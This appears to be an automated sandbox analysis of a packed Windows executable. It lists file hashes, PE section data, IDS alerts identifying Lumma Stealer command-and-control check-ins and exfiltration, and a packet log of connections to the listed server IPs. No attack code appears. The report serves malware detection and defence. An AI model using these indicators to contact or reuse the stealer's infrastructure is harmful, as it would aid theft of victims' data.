                                                                                                                                                        SHA-256:6919A624F9BF1BB07C274488EA472F7A04A0B0093E14BD0BC0192B6F7D250ABF
                                                                                                                                                        SHA-512:276D75B7C35D2A6775B40E19D4D9974FD8895063F5A0EFFB4A3A64C6FEA3D5F398DF46945891E30B34CD39C4C4011D1078F5925476D320CB80808402AC247A36
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643700" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                        Entropy (8bit):4.416676553356215
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:Ucifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNI5+:5i58oSWIZBk2MM6AFBGo
                                                                                                                                                        MD5:F792E8390887283205080E8B5431A764
                                                                                                                                                        SHA1:58BBE35AD84A66B21CEAE15AA6B563181D7BC7FB
                                                                                                                                                        SHA-256:82C8935FE0BC808A2E93FEFC409750645E80920FEB2B6238261EA538BA2D8DCC
                                                                                                                                                        SHA-512:3290EFD423A50C0497734FE95709B683C9BC18213AF72CEE66A4A22BFB015B364216F58F8E0EB762723985EB94E7769528309D01E8B2B8F1B6F061C28878FDF2
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.Y...U..............................................................................................................................................................................................................................................................................................................................................K...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.53396009093084
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: LP4a6BowQN.exe
File size: 2'969'088 bytes
MD5: 80429ec2b7c1a75bc06b68846eb8be34
SHA1: b58d0acbef2af53e2d507cfd4fb3c07ea5d6a91e
SHA256: 20255112ad07c22d1d56b35fb01dbf5592bd679dd8903d66bfe871badae4b0f2
SHA512: 4eec8f86baf15ea8a50c8675afed272309cd2b5bf5f96523093ac73db9f5beb9db0f28b884ba39a18d6e969c621f1eba31f52ad368c5b3c02be2694739942ba7
SSDEEP: 24576:7M/xBerHHvpMlOe1o1h+RfI0GKDfeMt7pGdQgBzN4x3ZzduC8CEoDKCxyKDtbX0E:7uBoHxOODuYMtngdTYbX0CF62b+ICcr
TLSH: 09D55B91BC0572CFD08E1678971BCE42A85E47F64B2158D3EC6CA1BA7DB7CC116BAC24
                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g............................. 0...........@..........................P0.......-...@.................................T0..h..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x702000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x53054          0x68          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x531f8          0x8           .idata
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name           Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type             Entropy             Characteristics
(unprintable)  0x1000           0x51000       0x24800   08e5e886640d33ca1a7481b545bb719a  False     0.9974582619863014  data                  7.980570361572185   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc          0x52000          0x1000        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty                 0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata         0x53000          0x1000        0x200     19a29171433eeef17e42fd663f137134  False     0.14453125          data                  0.9996515881509258  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nxyovwhs       0x54000          0x2ad000      0x2ace00  9ca5ee55bc872499e618a443934935ef  unknown   unknown             unknown               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mlwhfqbs       0x301000         0x1000        0x400     92f8d524752b4d559c0573a047c91ae4  False     0.7919921875        data                  6.150351651041809   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant       0x302000         0x3000        0x2200    52da4d5bb4d88d11caf08d7c6deac2e2  False     0.064453125         DOS executable (COM)  0.7645155615730779  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL           Import
kernel32.dll  lstrcpy
Timestamp                        SID      Signature                                                                          Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-12-23T08:19:03.502498+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                          3         192.168.2.7  49700        104.21.32.96    443        TCP
2024-12-23T08:19:04.247996+0100  2049836  ET MALWARE Lumma Stealer Related Activity                                          1         192.168.2.7  49700        104.21.32.96    443        TCP
2024-12-23T08:19:04.247996+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                          1         192.168.2.7  49700        104.21.32.96    443        TCP
2024-12-23T08:19:05.590428+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                          3         192.168.2.7  49701        104.21.32.96    443        TCP
2024-12-23T08:19:11.524442+0100  2049812  ET MALWARE Lumma Stealer Related Activity M2                                       1         192.168.2.7  49701        104.21.32.96    443        TCP
2024-12-23T08:19:11.524442+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                          1         192.168.2.7  49701        104.21.32.96    443        TCP
2024-12-23T08:19:13.114569+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                          3         192.168.2.7  49713        104.21.32.96    443        TCP
2024-12-23T08:19:15.782207+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                          3         192.168.2.7  49719        104.21.32.96    443        TCP
2024-12-23T08:19:18.282621+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                          3         192.168.2.7  49725        104.21.32.96    443        TCP
2024-12-23T08:19:20.990517+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                          3         192.168.2.7  49735        104.21.32.96    443        TCP
2024-12-23T08:19:21.966381+0100  2048094  ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration                              1         192.168.2.7  49735        104.21.32.96    443        TCP
2024-12-23T08:19:23.714226+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                          3         192.168.2.7  49747        104.21.32.96    443        TCP
2024-12-23T08:19:23.841820+0100  2843864  ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2    1         192.168.2.7  49747        104.21.32.96    443        TCP
2024-12-23T08:19:29.751080+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                          3         192.168.2.7  49758        104.21.32.96    443        TCP
2024-12-23T08:19:30.519681+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                          1         192.168.2.7  49758        104.21.32.96    443        TCP
2024-12-23T08:19:32.053151+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                          3         192.168.2.7  49764        185.166.143.49  443        TCP
2024-12-23T08:19:34.464774+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                          3         192.168.2.7  49775        16.182.101.249  443        TCP
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Dec 23, 2024 08:19:02.222573996 CET  49700        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:02.222615957 CET  443          49700      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:02.222752094 CET  49700        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:02.232940912 CET  49700        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:02.232959032 CET  443          49700      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:03.502381086 CET  443          49700      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:03.502497911 CET  49700        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:03.507144928 CET  49700        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:03.507150888 CET  443          49700      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:03.507579088 CET  443          49700      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:03.553814888 CET  49700        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:03.567589045 CET  49700        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:03.567620993 CET  49700        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:03.567890882 CET  443          49700      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:04.247999907 CET  443          49700      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:04.248102903 CET  443          49700      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:04.248198032 CET  49700        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:04.364831924 CET  49700        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:04.364831924 CET  49700        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:04.364862919 CET  443          49700      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:04.364867926 CET  443          49700      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:04.376036882 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:04.376082897 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:04.376255035 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:04.376562119 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:04.376573086 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:05.590109110 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:05.590428114 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:05.618906975 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:05.618926048 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:05.619180918 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:05.646373987 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:05.646543026 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:05.646595001 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.524429083 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.524504900 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.524553061 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.524563074 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:11.524579048 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.524734020 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:11.524740934 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.527137995 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.527252913 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:11.527271986 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.535507917 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.535691977 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:11.535710096 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.543865919 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.543912888 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:11.543922901 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.585091114 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:11.716284037 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.718513012 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.718580008 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:11.718590021 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.725927114 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.726020098 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:11.726202965 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:11.726203918 CET  49701        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:11.726222038 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.726238966 CET  443          49701      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.892868996 CET  49713        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:11.892924070 CET  443          49713      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:11.893039942 CET  49713        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:11.893500090 CET  49713        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:11.893508911 CET  443          49713      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:13.114435911 CET  443          49713      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:13.114568949 CET  49713        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:13.115869999 CET  49713        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:13.115876913 CET  443          49713      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:13.116799116 CET  443          49713      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:13.125323057 CET  49713        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:13.125461102 CET  49713        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:13.125494003 CET  443          49713      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:14.116319895 CET  443          49713      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:14.116600990 CET  443          49713      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:14.116664886 CET  49713        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:14.274437904 CET  49713        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:14.274478912 CET  443          49713      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:14.562024117 CET  49719        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:14.562079906 CET  443          49719      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:14.562182903 CET  49719        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:14.562612057 CET  49719        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:14.562627077 CET  443          49719      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:15.782105923 CET  443          49719      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:15.782207012 CET  49719        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:15.783941031 CET  49719        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:15.783946991 CET  443          49719      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:15.784246922 CET  443          49719      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:15.785517931 CET  49719        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:15.785670042 CET  49719        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:15.785705090 CET  443          49719      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:15.785773993 CET  49719        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:15.827322960 CET  443          49719      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:16.754496098 CET  443          49719      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:16.754606009 CET  443          49719      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:16.754776955 CET  49719        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:16.755040884 CET  49719        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:16.755059004 CET  443          49719      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:17.070183039 CET  49725        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:17.070223093 CET  443          49725      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:17.070362091 CET  49725        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:17.070720911 CET  49725        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:17.070738077 CET  443          49725      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:18.282507896 CET  443          49725      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:18.282620907 CET  49725        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:18.286905050 CET  49725        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:18.286911964 CET  443          49725      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:18.287178040 CET  443          49725      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:18.288660049 CET  49725        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:18.288755894 CET  49725        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:18.288789034 CET  443          49725      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:18.288862944 CET  49725        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:18.288872004 CET  443          49725      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:19.253293037 CET  443          49725      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:19.253390074 CET  443          49725      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:19.253489017 CET  49725        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:19.253695965 CET  49725        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:19.253715992 CET  443          49725      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:19.777648926 CET  49735        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:19.777704000 CET  443          49735      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:19.778084993 CET  49735        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:19.778350115 CET  49735        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:19.778367996 CET  443          49735      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:20.990215063 CET  443          49735      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:20.990516901 CET  49735        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:21.201600075 CET  49735        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:21.201621056 CET  443          49735      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:21.201988935 CET  443          49735      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:21.211268902 CET  49735        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:21.211605072 CET  49735        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:21.211611032 CET  443          49735      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:21.966392040 CET  443          49735      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:21.966500998 CET  443          49735      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:21.966558933 CET  49735        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:21.966697931 CET  49735        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:21.966717958 CET  443          49735      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:22.501697063 CET  49747        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:22.501730919 CET  443          49747      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:22.501828909 CET  49747        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:22.502218962 CET  49747        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:22.502229929 CET  443          49747      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:23.712321997 CET  443          49747      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:23.714226007 CET  49747        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:23.718338013 CET  49747        443        192.168.2.7   104.21.32.96
Dec 23, 2024 08:19:23.718343019 CET  443          49747      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:23.718590021 CET  443          49747      104.21.32.96  192.168.2.7
Dec 23, 2024 08:19:23.772703886 CET  49747        443        192.168.2.7   104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.840552092 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.841398954 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.841442108 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.841545105 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.841579914 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.841708899 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.841738939 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.841850042 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.841881990 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.842008114 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.842041969 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.842202902 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.842231989 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.842236042 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.842251062 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.842345953 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.842374086 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.842415094 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.842530966 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.842556000 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.883322001 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.883498907 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.883522034 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.883543968 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.883565903 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.883584976 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.883599997 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:28.529529095 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:28.529608965 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:28.529710054 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:28.529937029 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:28.529946089 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:28.538683891 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:28.538713932 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:28.538901091 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:28.539124012 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:28.539136887 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:29.750931978 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:29.751080036 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:29.752408981 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:29.752414942 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:29.752652884 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:29.758899927 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:29.763294935 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:29.763329029 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:30.519680023 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:30.519778967 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:30.519860983 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:30.520071030 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:30.520071030 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:30.520087957 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:30.520097017 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:30.661485910 CET49764443192.168.2.7185.166.143.49
                                                                                                                                                        Dec 23, 2024 08:19:30.661531925 CET44349764185.166.143.49192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:30.661679029 CET49764443192.168.2.7185.166.143.49
                                                                                                                                                        Dec 23, 2024 08:19:30.662061930 CET49764443192.168.2.7185.166.143.49
                                                                                                                                                        Dec 23, 2024 08:19:30.662075996 CET44349764185.166.143.49192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:32.053014040 CET44349764185.166.143.49192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:32.053150892 CET49764443192.168.2.7185.166.143.49
                                                                                                                                                        Dec 23, 2024 08:19:32.060362101 CET49764443192.168.2.7185.166.143.49
                                                                                                                                                        Dec 23, 2024 08:19:32.060379982 CET44349764185.166.143.49192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:32.060627937 CET44349764185.166.143.49192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:32.062254906 CET49764443192.168.2.7185.166.143.49
                                                                                                                                                        Dec 23, 2024 08:19:32.103377104 CET44349764185.166.143.49192.168.2.7
